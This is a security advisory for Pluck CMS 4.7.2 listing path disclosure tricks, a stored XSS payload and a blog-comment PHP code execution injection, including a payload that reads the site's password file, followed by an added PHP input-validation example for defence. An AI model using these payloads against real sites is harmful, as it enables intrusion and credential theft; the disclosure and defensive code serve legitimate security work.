Pluck CMS:			http://www.pluck-cms.org/
Version:			4.7.2
By Ross Marks: 		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1. Full Path Disclosure
	change the session "PHPSESSID" value to an array, then refresh the page to get:
		Notice: Array to string conversion in /var/www/website/public_html/pluck/login.php on line 19

2. Full Path Disclosure
	add non-alphanumeric chars to "PHPSESSID" to get:
		Warning: session_start(): The session id is too long or contains illegal characters,
		valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/website/public_html/pluck/login.php on line 19

3. Full Path Disclosure
	change the ?image variable to an array, e.g.
		http://website.com/pluck/data/modules/albums/albums_getimage.php?image[]=test
	result:
	Warning: strpos() expects parameter 1 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 19
	Warning: strpos() expects parameter 1 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 28
	Warning: preg_match() expects parameter 2 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 29
	Notice: Array to string conversion in /path/to/pluck/data/modules/albums/albums_getimage.php on line 39

4. Full Path Disclosure
	$image is expected to be a path, so pass a string containing a null byte (%00), e.g.
		http://website.com/pluck/data/modules/albums/albums_getimage.php?image=test%00test
	result: 
	Warning: file_exists() expects parameter 1 to be a valid path, string given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 39
	
5. Stored XSS (requires access)
		use the "edit HTML source" option from TinyMCE to write JavaScript directly, e.g.
			<script>alert(1);</script>
		
6. PHP Code Execution (add slashes active)
		use blog comment with test data and a comment of:
			ls -la &\';system($reaction_message);//
		another example (to read unsalted MD5 password - refresh page and it'll be in source)
			cat data/settings/pass.php &\';system($reaction_message);//
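
Items 1-4 all come from request input of an unexpected type or content reaching PHP functions while errors are shown in the response. The following is an added example, not Pluck code and not from the original advisory: a type and content check placed before those calls, with error display turned off. It assumes PHP 7.1+; the function names, the 128-character cap and the file-name pattern are hypothetical.

```php
<?php
// Added illustration; not Pluck source. Function names are hypothetical.

// Keep diagnostics out of responses so warnings (and the paths in them)
// go to the server log instead of the page.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Items 1-2: the id must be a string built only from the characters the
// session_start() warning lists. The 128-character cap is an assumption.
function valid_session_id($value): bool
{
    return is_string($value)
        && preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $value) === 1;
}

// Items 3-4: the parameter must be a string (not image[]=...), contain no
// NUL byte, and look like a bare file name. The name pattern is an assumption.
function clean_image_name($value): ?string
{
    if (!is_string($value) || strpos($value, "\0") !== false) {
        return null;
    }
    if (preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?\z/', $value) !== 1) {
        return null;
    }
    return $value;
}

// Reject bad input before it reaches session_start(), strpos(),
// preg_match() or file_exists().
$sid = $_COOKIE['PHPSESSID'] ?? null;      // absent cookie = new session
if ($sid !== null && !valid_session_id($sid)) {
    http_response_code(400);
    exit;
}
session_start();

$image = clean_image_name($_GET['image'] ?? null);
if ($image === null) {
    http_response_code(400);
    exit;
}
// $image is now a NUL-free plain string with no path separators.
```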